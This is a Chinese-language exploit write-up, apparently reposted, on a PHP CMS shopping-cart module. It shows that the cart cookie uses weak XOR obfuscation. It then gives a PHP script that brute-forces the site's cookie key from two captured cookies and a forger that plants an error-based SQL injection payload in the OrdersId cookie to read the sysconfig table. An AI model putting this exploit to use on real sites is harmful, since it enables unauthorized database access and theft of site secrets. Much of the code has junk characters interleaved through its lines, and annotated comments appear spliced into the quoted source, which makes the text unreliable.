www.xxx.com/plus/search.php?keyword=
在 include/shopcar.class.php 中
先看一下这个 shopcar 类是如何生成 cookie 的
/**
 * Persist a cart value into a browser cookie.
 *
 * Arrays are first flattened by enCode() (the page describes this as
 * producing an a=yy&b=cc style string) and then run through enCrypt();
 * scalars go straight to enCrypt().
 *
 * @param string $key   cookie name
 * @param mixed  $value array or scalar to store
 * @return void
 *
 * NOTE(review): enCrypt()/setKey() (further down the page) are plain XOR
 * transforms with no integrity tag, so nothing here lets the server detect
 * a cookie the client has rewritten. The cookie is also set without the
 * secure/httponly arguments and with a fixed 36000-second lifetime.
 */
function saveCookie($key, $value)
{
    $payload = is_array($value)
        ? $this->enCrypt($this->enCode($value))
        : $this->enCrypt($value);

    setcookie($key, $payload, time() + 36000, '/');
}
简单地说,$key 就是 cookie 的 key,$value 就是 value,enCode 的作用是将 array 类型转变为 a=yy&b=cc&d=know 这样的字符串,关键是 enCrypt 函数。
/**
 * Obfuscate $txt for storage in a cookie.
 *
 * Picks a per-call key (md5 of rand(0, 32000)), XORs each byte of $txt with
 * the corresponding key byte and writes that key byte into the output right
 * before the XORed byte, then passes the result through setKey() and
 * base64-encodes it.
 *
 * @param string $txt plain text to transform
 * @return string base64-encoded output
 *
 * NOTE(review): rand(0, 32000) yields at most 32001 distinct keys, and each
 * key byte is emitted into the output next to the byte it masks, so this
 * layer adds no real secrecy; setKey() is the only step that depends on a
 * server-side value. There is no MAC, so a receiver cannot distinguish a
 * forged cookie from a genuine one.
 */
function enCrypt($txt)
{
    srand((double) microtime() * 1000000);
    $sessionKey = md5(rand(0, 32000));
    $keyLen = strlen($sessionKey);
    $len = strlen($txt);

    $out = '';
    $pos = 0;
    for ($i = 0; $i < $len; $i++) {
        if ($pos == $keyLen) {
            $pos = 0;
        }
        // key byte, then the masked byte
        $out .= $sessionKey[$pos] . ($txt[$i] ^ $sessionKey[$pos]);
        $pos++;
    }

    return base64_encode($this->setKey($out));
}
/**
 * XOR $txt with the repeating key md5(strtolower($cfg_cookie_encode)).
 *
 * The transform is its own inverse: applying setKey() twice returns the
 * original string.
 *
 * @param string $txt bytes to transform
 * @return string transformed bytes, same length as $txt
 *
 * NOTE(review): the key is the 32-character hex digest, so every key byte
 * is one of only 16 values ("0"-"9", "a"-"f"); together with the absence of
 * any authentication tag this is not a substitute for real encryption.
 */
function setKey($txt)
{
    global $cfg_cookie_encode;

    $siteKey = md5(strtolower($cfg_cookie_encode));
    $keyLen = strlen($siteKey);
    $len = strlen($txt);

    $out = '';
    for ($i = 0, $pos = 0; $i < $len; $i++, $pos++) {
        if ($pos == $keyLen) {
            $pos = 0;
        }
        $out .= $txt[$i] ^ $siteKey[$pos];
    }

    return $out;
}
enCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
然后到了 enCrypt 调用 setKey 时的参数 $tmp,这个参数在某种意义上我们也是可知的,因为 $encrypt_key = md5(rand(0, 32000)); 只有 32000 种可能,我们可以推出 32000 种可能的 $tmp,从而推出 32000 种可能的 md5(strtolower($cfg_cookie_encode))。对了,忘记说了,我们的目的是推测出 setKey 中 $encrypt_key 的值,然后才能任意构造出购物车的 cookie。从推出的 32000 种 md5(strtolower($cfg_cookie_encode)) 中,简单过滤掉含非字母数字字符的 key,就只剩下几百个可能的 key;然后我们再重新下一次订单,再获取几百个可能的 key,取交集,得到最终 key。
具体代码如下:
<?php
3 r2 l+ B; ?; T9 M' u$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here6 I& g0 a7 t! _) W& A0 [
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
( l; h; |9 Z, h2 q' n0 x( z$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here$ q* O0 V7 o5 o- Y
function reStrCode($code,$string)
4 A6 T) Z$ d0 `+ w+ u; f{
0 Y v0 M7 x1 z& Q' C0 y% \* s$code = base64_decode($code);9 L; @, F6 _3 V: t' u
$key = “”;
Q9 A" h) Z! P' ~+ e' q" X+ [for($i=0 ; $i<32 ; $i++)
# x, q% S6 N% d7 g{7 v7 o. A- h: Y8 Z4 ] d
$key .= $string[$i] ^ $code[$i];
% O6 g/ f4 Z/ h S: X& s}
S1 H3 S D( d% q+ e6 |return $key;9 o( v( _7 |8 n8 L' T [% y
}; E0 B# ?( g/ o V/ V) R: t* Y
function getKeys($cookie,$plantxt)
; E9 ^* Q" u: H{; t# \+ |( g' r9 c. S [ S) n( I
$tmp = $cookie;
8 z7 u' {: V( @$ i/ X$results = array();
, w; `' D+ A# z- ?. V( Dfor($j=0 ; $j < 32000; $j++)0 a- d4 H9 y: o7 w0 n
{
t0 K3 W$ M k+ {7 R k; q$ t8 [1 f
$txt = $plantxt;+ V3 K) Y! e' ]& b' n+ C
$ctr = 0;
2 l* z0 k. P/ a7 z i/ M, u+ n$tmp = ”;# g, v$ D+ ]1 p& }
$encrypt_key = md5($j);' `( i4 _% e2 x! i
for($i =0; $i < strlen($txt); $i ++)
# Y; O4 k! Z/ {" x4 I5 ?& [3 _{
- N" ?% o# E1 x$ f: Q( I/ |) [" \$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;6 A5 o0 n* V# M3 L
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);& S* z5 h$ a; C" A# e
}1 z, |% f( k, U: q0 w
$string = $tmp;
( F/ X3 k: O- w0 }$code = $cookie;$ Y6 E9 J0 z7 N& |5 h8 U. f
$result = reStrCode($code,$string);, w2 v _6 }+ p
if(eregi(‘^[a-z0-9]+$’,$result))
; F0 f1 h7 Y' J5 c{
8 N8 i4 B& [. a8 ^, n' wecho $result.”\n”;
8 Q& w& y9 ], T. H S$results[] = $result;, |$ K) g3 }1 C# n+ ~$ n( s
}
+ |- [& O& a7 ~$ w% @$ p}) y* t7 A3 P3 A
return $results;7 h7 ^' I6 J2 {( }( K$ F3 R7 `( n. k# Q
}
$ Y5 X4 G, Y i) Y$results1 = getKeys($cookie1,$plantxt);
* @ A8 N9 {7 Z. R C$results2 = getKeys($cookie2,$plantxt);
; L4 @4 ?! c. [( v: ^2 d. [: |print “\n——————–real key————————–\n”;4 `8 b, u" h- Q v8 Z, m2 c
foreach($results1 as $test1)5 F+ q; t+ ^2 p6 B( z4 {2 \
{
5 \1 Q# h. }& o/ ~5 ]5 o4 B/ Y% Iforeach($results2 as $test2)
4 o" Y+ n6 J. o( V3 \0 g, e8 E{! W9 U! }0 Q5 j6 P* {. B
if($test1 == $test2), n% |6 k h+ N1 R
{
* c7 |$ r" J0 l8 }6 a1 f, ?" oecho $test1.”\n”;% Q4 j4 l* d4 r& c) O" `2 a
}
^3 ^ S+ b% j o$ ?0 K, c I2 p}
5 n% P# g1 I% d5 s2 Y}1 V! v6 m" F) M- l; S6 j0 U
?>1 W2 J5 D c# e r- y! \
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
plantxt 可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1
然后推算出md5(strtolower($cfg_cookie_encode))
得到这个 key 之后,我们就可以构造任意购物车的 cookie
接着看
: T: l6 V' s# n8 U8 z20 class MemberShops
8 u6 K9 n8 X! n1 y3 X21 {
+ v. m* a5 R C7 v* p22 var $OrdersId;! s3 _) D1 n" ~8 Q9 e0 e0 e: j
23 var $productsId;" c! ]" t5 d( D, T! k) i4 ?' ?: k
243 q% ^ a4 B- `' \6 c( ?; K; l
/**
 * Load the current order id from the "OrdersId" cookie, creating a new
 * order via MakeOrders() when the cookie value is missing or empty.
 *
 * NOTE(review): the value is taken directly from the client; further down
 * the page (/plus/carbuyaction.php) it is interpolated into a SQL string,
 * so a format check here — or an escaped/parameterised query there — is
 * needed. getCookie() and MakeOrders() are not shown in this excerpt.
 */
function __construct()
{
    // property is assigned first so that MakeOrders() sees the cookie value, as in the original order of statements
    $this->OrdersId = $this->getCookie("OrdersId");
    if (!$this->OrdersId) {
        $this->OrdersId = $this->MakeOrders();
    }
}
发现OrderId是从cookie里面获取的
然后
/plus/carbuyaction.php 中的
// /plus/carbuyaction.php (excerpt)
$cart = new MemberShops();
$OrdersId = $cart->OrdersId; // order id for this request, read from the client cookie in MemberShops::__construct()
// … intervening lines omitted in the excerpt …
// NOTE(review): $OrdersId originates in a client-controlled cookie and is
// interpolated into the query text unescaped — it must be validated or bound
// as a parameter before reaching GetOne().
$sql = "SELECT `oid` FROM #@__shops_orders WHERE oid='$OrdersId' LIMIT 0,1";
$rows = $dsql->GetOne($sql);
接着我们就可以注入了
通过利用下面代码生成cookie:
, a" e7 v9 M4 g1 h; e5 F4 Y<?php( |- K5 y9 E) \! A" m9 T
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
6 g- V, M; D' X1 z$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here$ h% R n% m' t) B0 K* J% {0 _5 N
function setKey($txt)
) g0 f6 q( i' v' z{" e0 z0 i8 N& B# U4 }
global $encrypt_key;
- C/ w2 M1 N( s1 M1 D. o$ctr = 0;
$ e% [8 Q ~9 m0 S$tmp = ”;
; i1 ]2 q5 h' e" \4 M/ j% z4 {for($i = 0; $i < strlen($txt); $i++)
, y1 r+ b: W6 t/ _! ]{7 X4 \' C$ C+ g0 M8 L
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;* ]9 X, y6 R/ j7 s
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
. A* ^5 t- f5 W* C6 V}8 v; S8 H8 L8 H( B; G! _
return $tmp;
/ V7 G3 E! z1 H0 K}2 F% N; G j) u7 F n, ]
function enCrypt($txt)
2 Y; e1 ~5 j8 X{, O, i y8 ?$ F: B/ k( h
srand((double)microtime() * 1000000);" K- n3 R5 \3 {6 x
$encrypt_key = md5(rand(0, 32000));
( t1 K# q# s% H2 z$ ]0 }* e$ctr = 0;
1 }" K) ?0 `9 a p% v3 p$tmp = ”;
" }% u- \9 P7 ]. R+ O* W3 C- _8 E9 F0 gfor($i = 0; $i < strlen($txt); $i++). {8 |, g# {8 H9 ^7 }) ]- ]
{
$ J9 ?8 j1 V7 C' ?: j2 c0 F$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;" e7 \' ]6 F/ n
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);$ E0 A+ E% M" E1 J1 C- S
}( e0 x8 {, @) _: h
return base64_encode(setKey($tmp));- U J6 t- u1 y5 ?2 }
}
9 o8 P0 `9 o& y8 p; J0 efor($dest =0;$dest = enCrypt($txt);)
x: ^. L8 ^5 \) ^{- D" f5 A6 u& w; R- E
if(!strpos($dest,’+'))/ B- F! L' f; S
{
2 {! q* Z- a. z4 ? ?+ i* Bbreak;% R* a0 k5 W/ s. _
}9 ^4 W5 F! v+ K1 W
}
0 Q/ S _2 e9 W6 ]1 D' Decho $dest.”\n”;$ H: j) k$ n6 J( x7 N5 b' B
?>